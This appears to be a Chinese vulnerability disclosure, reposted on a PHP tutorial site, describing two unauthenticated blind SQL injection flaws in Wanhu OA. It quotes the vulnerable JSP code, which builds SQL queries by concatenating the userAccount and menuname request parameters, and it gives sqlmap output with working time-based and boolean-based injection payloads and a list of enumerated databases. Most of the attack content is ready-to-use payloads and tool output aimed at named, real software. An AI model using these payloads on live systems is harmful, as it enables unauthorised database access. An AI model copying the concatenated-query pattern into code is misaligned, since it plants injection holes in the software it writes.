来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] 万户OA两处盲注DBA权限(无需登陆)一处是布尔型盲注,适用万户OA标准版一处是延时盲注,通杀标准版和专业版详细说明:先说通杀标准版和专业版的延时盲注。注入点: defaultroot ou...
|
万户OA两处盲注DBA权限(无需登陆) 先说通杀标准版和专业版的延时盲注。
<%@ page contentType="text/html; charset=GBK"%>
<%
//盾安外部邮件登陆检查
com.whir.common.util.DataSourceBase dsb = new com.whir.common.util.DataSourceBase();
try{
java.sql.Connection conn = dsb.getDataSource().getConnection();
java.sql.Statement stmt = conn.createStatement();
java.sql.ResultSet rs = stmt.executeQuery("SELECT * FROM EZOFFICE.OA_MAILLOGIN WHERE USERACCOUNT='" + request.getParameter("userAccount") + "' AND RANDOM='" + request.getParameter("outMailRandom") + "'");
if(rs.next()){
out.print(true);
}else{
out.print(false);
}
conn.close();
}catch(Exception e){}
%>
sqlmap identified the following injection points with a total of 125 HTTP(s) requests:
---
Place: GET
Parameter: userAccount
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: userAccount=' AND 4843=BENCHMARK(5000000,MD5(0x4758714c)) AND 'YsEW'='YsEW&outMailRandom=
---
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
漏洞证明:再就是布尔型盲注了,这个只有标准版有。
<%
String flag=request.getParameter("flag");
String menuname = request.getParameter("menuname");
if("sync".equals(flag)){
//数据
String s_String = "";
int s_int = 0;
String[][] res = null;
DbOpt dbopt = null;
try {
dbopt = new DbOpt();
String Sql = "";
Sql = "select MENU_id,MENULEVEL,MENUVIEW,MENUVIEWUSER,MENUVIEWORG,MENUVIEWGROUP,MENUPARENT,MENUURL,MENUORDER,DESKTOP1,DESKTOP2,menuIdString,isSystemInit,INUSE,LEFTURL,RIGHTURL,MENUCODE,menuname from OA_MENUSET where menuname='"+menuname+"' ";
res = dbopt.executeQueryToStrArr2(Sql,18);
if(res != null){
String _cnt = dbopt.executeQueryToStr("Select count(*) from oa_custmenu where menu_name='"+menuname+"' ");
s_int = Integer.parseInt(_cnt);
.......
}else if(s_int>1){
s_String = "查出"+s_int+"条数据,未处理!";
}
}
dbopt.close();
} catch (Exception e) {
e.printStackTrace();
} finally {
try {
dbopt.close();
} catch (SQLException ex) {
}
}
%>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="pagebar">
<tr>
<td><%=s_String%> </td>
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: menuname
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: flag=sync&menuname=%E8%AE%BA%E5%9D%9B' AND 8760=8760 AND 'pBAh'='pBAh
---
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
available databases [3]:
[*] ezoffice
[*] information_schema
[*] mysql
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com